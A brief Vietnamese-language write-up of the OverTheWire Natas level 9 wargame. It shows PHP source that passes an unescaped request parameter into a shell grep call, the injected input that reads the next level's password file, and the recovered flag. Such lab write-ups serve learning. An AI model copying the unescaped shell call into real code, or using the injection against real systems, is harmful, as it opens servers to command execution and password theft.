[OverTheWire] Natas – Level 09
http://natas9.natas.labs.overthewire.org/
Find words containing…
Nhấn View sourcecode:
[php]
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
[/php]
Cú pháp lệnh grep có thể tham khảo tại:
Thông tin được cung cấp từ đầu:
Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.
Do biến $key không bị escape, ta có thể inject bằng input sau:
'' /etc/natas_webpass/natas10;
Kết quả:
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
→ flag = nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu.
Recent comments